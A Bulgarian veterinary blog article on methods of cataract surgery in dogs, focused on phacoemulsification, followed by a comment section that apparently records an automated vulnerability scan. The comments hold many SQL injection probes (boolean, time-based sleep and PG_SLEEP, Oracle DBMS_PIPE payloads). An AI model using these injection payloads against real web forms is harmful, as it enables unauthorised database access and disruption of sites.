Факоемулсификация при кучешка катаракта

Автор Iskra Atanasova 21/02/2018 36 Коментари

Видове операции на катаракта при кучета

В днешно време най-надеждният и безспорно ефективен метод за лечение на патологиите на обектива, осигуряващ възстановяване на зрението и съхраняване нормалното функциониране на очната ябълка, е хирургичното отстраняване.

Екстракцията на катарактата (извличане, премахване на обектива) с цел запазване на очната ябълка и/или възстановяване на зрителните функции, е била, е и ще бъде една от технически най-сложните, но и в същото време основна, базова, може да се каже фундаментална микрохирургична офталмологична операция. Обективът е мощна, прозрачна, двойно изпъкнала леща, чиято функция е да формира ясно фокусирано изображение върху ретината. При невъзможност по-пълноценно да функционира заради загуба на прозрачност (катаракта) или изменения на анатомично правилното му положение, обективът не само влошава или напълно нарушава зрителните функции на окото, но е и като цяло заплаха за очната ябълка като орган. Най-честите усложнения, съпровождащи патологиите на обектива, са увеитът и вторичната глаукома.

Методи на екстрадиране на катарактата при кучета

Катарактата при кучетата често налага операция на окото за премахване на катарактата чрез екстракапсулна, интракапсулна екстракция, факоемулсификация или метода Discission and aspirationИма четири основни метода за премахването на кучешката катаракта:

Екстракапсуларна екстракция

При този метод след разширяване на зеницата и разрез на роговицата, се отваря предната капсула на обектива. Премахва се участъкът на предната капсула, ядрото на обектива и кортикалната маса. Периферната част на капсулата на лещата и задната капсула, съответно и връзковият апарат на обектива, включително и цилиарните влакна и пръстеновидната връзка, остават незасегнати. Тази методика в продължение на десетилетия е била основният метод за отстраняването на катаракта при кучетата. Успехът на този тип операция е 90%. Недостатъкът му е необходимостта от широко отваряне на роговицата и последващото и зашиване (при диаметър на плътния обектив 11 мм и дебелина 7 мм, минималната дължина на разреза е 13-15 мм). Освен това, в момента на отварянето на предната камера и изваждането на обективното ядро, вътреочното налягане рязко спада, което се отразява изключително негативно върху хемо- и хидродинамиката на окото.

Интракапсуларна екстракция

При този метод, след разширяването на зеницата и разрязването на роговицата, обективът се изважда заедно с предната капсула. При човека тази процедура обикновено се провежда с помощта на криоекстрактор („примразяват“ обектива към работния накрайник на инструмента), след предварително разрушаване на цилиарните влакна с помощта на инструмент или ензимни препарати. След този метод на екстрадиране, имплантирането на изкуствена вътреочна леща е възможно само с фиксиране в предната камера или в отверстието на зеницата, или в цилиарния улей. Този метод, от еволюционна гледна точка, е най-ранният метод за премахване на лещата и в своето време се е използвал много. Но при животните използването му е ограничено само в случаите на отделянето на обектива при неговата луксация, тъй като пръстеновидната връзка на лещата с предната хиалоидна мембрана е много здрава и при интракапсуларната екстрация, в повечето случаи, води до разрив на тази мембрана и изпадане на стъкловидното тяло. Изключение са само случаите на успешно интракапсуларно премахване на обектива при ранна първична луксация при кучета.

Discission and aspiration

Това е метод, чрез който се разтваря предната капсула, промива се и се аспирира течното съдържимо на обектива, което е възможно при меките катаракти при много млади животни, а също и в случаите на презрели катаракти. При този метод разтварянето на предната капсула и аспирацията на масата в обектива се осъществява през малка дупка в роговицата. Но тъй като по вътрешната повърхност на предната капсула остава еднослоен кубичен епител, който нормално играе роля в подхранването на обектива и е способен за в бъдеще да даде началото на вторична преднокапсуларна катаракта, така или иначе е необходимо да се премахне участъкът на предната капсула и съответно да се увеличи разрезът на роговицата.

Факоемулсификация

Факоемулсификация е операция на катаракта при кучетата - е нов, по-малко агресивен метод метод за опериране на очитеФакоемулсификация (от гръцки phakos – леща и английски – emulsification – превръщане в емулсия) значи дословно – превръщане на обектива в емулсия.

Този метод за пръв път е предложен от американския офталмолог Чарлс Келман през 60-те години на миналия век. Интересното е, че първата публикувана от него през 1967 година работа е посветена на новата техника за премахване на катарактата с помощта на нискочестотен ултразвук. В експеримент върху очите на животните, д-р Келман е провел операции на очи на 40 котки и 30 кучета, така че можем да го смятаме за основоположник не само на тази техника като такава, но и за пионер в областта на екстракция на катаракта при животните.

Същността на метода на факоемулсификация се изразява в разрушаване на обектива с куха метална игла, която се колебае в честотите от 20 до 60 хиляди пъти в секунда. Заради механичното раздробяващо въздействие на иглата и въздействието на кавитационния облак (продукт от въздействието на ултразвука върху течността, което представлява смес от течност с вакуумни мехурчета) обективът се разрушава. Разрушената маса се аспирира през кухината на ултразвуковата игла. Едновременно с това, за поддържане на постоянния обем и налягане в предната камера на окото, посредством иригационен път в предната камера постоянно се подава течност. Обединявайки накрайника на иглата с аспириращата и иригационната система се получава инструмент, с помощта на който може да се премахне обектив с всякаква плътност и размер чрез малък разрез.

Предимствата на факоемулсификацията

Очевидни са!

Обективът, независимо от плътността и размера му, може да се премахне през много малък разрез (1,5-3,5 мм), който не изисква шевове и който осигурява минимален следоперативен астигматизъм. Заздравяването на тъканта се случва бързо и сигурно, без забележими козметични дефекти. Това е много важно при кучетата, тъй като се скъсява трудният, изискващ постоянно носене на защитна превръзка следоперативен период. Методът намалява риска от самонараняване на оперираното място и не е необходима допълнителна анестезия за премахването на шевовете от роговицата.

 

Стадии на факоемулсификация за премахване на катаракта при кучетата

 

Подготовка на окото на куче при факоемулсификация на катаракта при кучеФакоемуслификацията за премахване на катаракта при кучета се извършва с куха ултразвукова иглаПри факоемулсификация обективът на окото на кучето с катаракта се премахва чрез ултразвукФакоемулсификация е хирургичен метод за отделяне на катаракта при кучетатаПри факоемулсификация за премахване на катаракта при кучета се поставя изкуствена лещаИзкуствената вътреочна леща се поставя при факоемулсификация при кучета с катаракта, за запазване на зрението им
Подготвяне на окото за факоемулсификацияФакоемулсификация с ултразвукОтделяне на засегнатия обектив от окотоПодготвка за поставяне на имплантИмплантиране на изкуствена леща в окотоИзкуствен вътреочен обектив

 

Операцията се провежда при „затворена“ предна камера, с минимални нарушения на хидро- и хемодинамиката на окото, което значително намалява вероятността от възникване на вътреочни кръвоизливи, провокирани от резки колебания на налягането в окото при операция.

Използването на ултразвуков накрайник, в съчетание със системата на асипацио-иригация, позволява по-качествено да се освободи обективният джоб от кортикалната маса. Това значително намалява честотата на възникване на вторични капсуларни катаракти. Общоприетите стандарти на микрохирургичните инструменти за факоемулсификация, в съчетание със специално разработените вътреочни лещи (меки, напасващи се, цветни лещи за имплантиране с помощта на специални пинцети или инжектори), значително опростява както самия етап на факоемулсификацията, така и имплантирането на изкуствените лещи през малки и свръх малки разрези.

Основният недостатък при този метод за опериране на катаракта е отрицателното въздействие на ултразвука върху вътреочните тъкани, особено върху ендотела на роговицата, и термичното въздействие на ултразвуковата игла върху тъканите на разреза. В това отношение е изключително важна техниката за изпълнение на операцията – майсторството на микрохирурга и изборът на режим на работа на факоемулсификатора.

36 Коментари

wUmrLVWz:
22/10/2020, 11:30:46 AM, www.vulnweb.com
Изпрати

e

wUmrLVWz:
22/10/2020, 11:31:11 AM

1

wUmrLVWz:
22/10/2020, 11:33:34 AM

1

wUmrLVWz:
22/10/2020, 11:33:35 AM

1

wUmrLVWz:
22/10/2020, 11:33:57 AM

1

wUmrLVWz:
22/10/2020, 11:33:58 AM

1

wUmrLVWz:
22/10/2020, 11:34:14 AM

1

wUmrLVWz:
22/10/2020, 11:34:17 AM

1

wUmrLVWz:
22/10/2020, 11:34:18 AM

-1 OR 2+82-82-1=0+0+0+1 --

wUmrLVWz:
22/10/2020, 11:34:20 AM

-1 OR 3+82-82-1=0+0+0+1 --

wUmrLVWz:
22/10/2020, 11:34:20 AM

-1 OR 2+902-902-1=0+0+0+1

wUmrLVWz:
22/10/2020, 11:34:21 AM

-1 OR 3+902-902-1=0+0+0+1

wUmrLVWz:
22/10/2020, 11:34:22 AM

-1' OR 2+932-932-1=0+0+0+1 --

wUmrLVWz:
22/10/2020, 11:34:23 AM

-1' OR 3+932-932-1=0+0+0+1 --

wUmrLVWz:
22/10/2020, 11:34:23 AM

-1' OR 2+979-979-1=0+0+0+1 or 'IuEOYBZW'='

wUmrLVWz:
22/10/2020, 11:34:27 AM

-1' OR 3+979-979-1=0+0+0+1 or 'IuEOYBZW'='

wUmrLVWz:
22/10/2020, 11:34:27 AM

-1" OR 2+284-284-1=0+0+0+1 --

wUmrLVWz:
22/10/2020, 11:34:29 AM

-1" OR 3+284-284-1=0+0+0+1 --

wUmrLVWz:
22/10/2020, 11:34:30 AM

if(now()=sysdate(),sleep(15),0)

wUmrLVWz:
22/10/2020, 11:34:30 AM

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

wUmrLVWz:
22/10/2020, 11:34:31 AM

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

wUmrLVWz:
22/10/2020, 11:34:31 AM

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

wUmrLVWz:
22/10/2020, 11:34:36 AM

-5 OR 141=(SELECT 141 FROM PG_SLEEP(15))--

wUmrLVWz:
22/10/2020, 11:34:37 AM

-5) OR 106=(SELECT 106 FROM PG_SLEEP(15))--

wUmrLVWz:
22/10/2020, 11:34:38 AM

-1)) OR 348=(SELECT 348 FROM PG_SLEEP(15))--

wUmrLVWz:
22/10/2020, 11:34:39 AM

q5s12pao' OR 590=(SELECT 590 FROM PG_SLEEP(15))--

wUmrLVWz:
22/10/2020, 11:34:40 AM

u05NvM0k') OR 936=(SELECT 936 FROM PG_SLEEP(15))--

wUmrLVWz:
22/10/2020, 11:34:42 AM

P1BTdjws')) OR 319=(SELECT 319 FROM PG_SLEEP(15))--

wUmrLVWz:
22/10/2020, 11:34:44 AM

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

wUmrLVWz:
22/10/2020, 11:34:46 AM

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

wUmrLVWz:
22/10/2020, 11:34:47 AM

1'"

wUmrLVWz:
22/10/2020, 11:34:49 AM

@@3iRpW

wUmrLVWz:
22/10/2020, 11:34:50 AM

1

wUmrLVWz:
22/10/2020, 11:34:51 AM

1

wUmrLVWz:
22/10/2020, 11:35:10 AM

1

wUmrLVWz:
22/10/2020, 11:35:10 AM

1

1'":
22/10/2020, 11:35:20 AM

1

@@MY61g:
22/10/2020, 11:35:20 AM

1

wUmrLVWz:
22/10/2020, 11:35:22 AM

1

wUmrLVWz:
22/10/2020, 11:35:23 AM

1

wUmrLVWz:
22/10/2020, 11:35:42 AM

1

wUmrLVWz:
22/10/2020, 11:35:44 AM

1

wUmrLVWz:
22/10/2020, 11:35:55 AM

1

wUmrLVWz:
22/10/2020, 11:35:57 AM

1

wUmrLVWz:
22/10/2020, 11:33:20 AM, www.vulnweb.com
Изпрати

e

wUmrLVWz:
22/10/2020, 11:33:22 AM, www.vulnweb.com
Изпрати

e

wUmrLVWz:
22/10/2020, 11:33:39 AM, www.vulnweb.com
Изпрати

e

wUmrLVWz:
22/10/2020, 11:33:40 AM, www.vulnweb.com
Изпрати

e

wUmrLVWz:
22/10/2020, 11:33:41 AM, www.vulnweb.com
Изпрати

-1 OR 2+473-473-1=0+0+0+1 --

wUmrLVWz:
22/10/2020, 11:33:42 AM, www.vulnweb.com
Изпрати

-1 OR 3+473-473-1=0+0+0+1 --

wUmrLVWz:
22/10/2020, 11:33:43 AM, www.vulnweb.com
Изпрати

-1 OR 2+475-475-1=0+0+0+1

wUmrLVWz:
22/10/2020, 11:33:43 AM, www.vulnweb.com
Изпрати

-1 OR 3+475-475-1=0+0+0+1

wUmrLVWz:
22/10/2020, 11:33:45 AM, www.vulnweb.com
Изпрати

-1' OR 2+637-637-1=0+0+0+1 --

wUmrLVWz:
22/10/2020, 11:33:46 AM, www.vulnweb.com
Изпрати

-1' OR 3+637-637-1=0+0+0+1 --

wUmrLVWz:
22/10/2020, 11:33:47 AM, www.vulnweb.com
Изпрати

-1' OR 2+334-334-1=0+0+0+1 or 's0zn4tyV'='

wUmrLVWz:
22/10/2020, 11:33:47 AM, www.vulnweb.com
Изпрати

-1' OR 3+334-334-1=0+0+0+1 or 's0zn4tyV'='

wUmrLVWz:
22/10/2020, 11:33:48 AM, www.vulnweb.com
Изпрати

-1" OR 2+92-92-1=0+0+0+1 --

wUmrLVWz:
22/10/2020, 11:33:49 AM, www.vulnweb.com
Изпрати

-1" OR 3+92-92-1=0+0+0+1 --

wUmrLVWz:
22/10/2020, 11:33:50 AM, www.vulnweb.com
Изпрати

if(now()=sysdate(),sleep(15),0)

wUmrLVWz:
22/10/2020, 11:33:51 AM, www.vulnweb.com
Изпрати

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

wUmrLVWz:
22/10/2020, 11:33:53 AM, www.vulnweb.com
Изпрати

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

wUmrLVWz:
22/10/2020, 11:33:55 AM, www.vulnweb.com
Изпрати

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

wUmrLVWz:
22/10/2020, 11:34:00 AM, www.vulnweb.com
Изпрати

8WFd9bc5' OR 248=(SELECT 248 FROM PG_SLEEP(15))--

wUmrLVWz:
22/10/2020, 11:34:01 AM, www.vulnweb.com
Изпрати

dhwhymSg') OR 540=(SELECT 540 FROM PG_SLEEP(15))--

wUmrLVWz:
22/10/2020, 11:34:05 AM, www.vulnweb.com
Изпрати

CWUVFMGC')) OR 840=(SELECT 840 FROM PG_SLEEP(15))--

wUmrLVWz:
22/10/2020, 11:34:07 AM, www.vulnweb.com
Изпрати

e'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

wUmrLVWz:
22/10/2020, 11:34:07 AM, www.vulnweb.com
Изпрати

1'"

wUmrLVWz:
22/10/2020, 11:34:10 AM, www.vulnweb.com
Изпрати

@@3KBZQ

wUmrLVWz:
22/10/2020, 11:34:11 AM, www.vulnweb.com
Изпрати

e

wUmrLVWz:
22/10/2020, 11:34:14 AM, www.vulnweb.com
Изпрати

e

wUmrLVWz:
22/10/2020, 11:34:24 AM, www.vulnweb.com
Изпрати

e

wUmrLVWz:
22/10/2020, 11:34:25 AM, www.vulnweb.com
Изпрати

e

1'":
22/10/2020, 11:34:41 AM, www.vulnweb.com
Изпрати

e

@@2hz4z:
22/10/2020, 11:34:41 AM, www.vulnweb.com
Изпрати

e

wUmrLVWz:
22/10/2020, 11:34:44 AM, www.vulnweb.com
Изпрати

e

wUmrLVWz:
22/10/2020, 11:34:45 AM, www.vulnweb.com
Изпрати

e

wUmrLVWz:
22/10/2020, 11:34:59 AM, 1'"
Изпрати

e

wUmrLVWz:
22/10/2020, 11:35:00 AM, @@44nK1
Изпрати

e

wUmrLVWz:
22/10/2020, 11:35:40 AM, www.vulnweb.com
Изпрати

1

Ваш коментар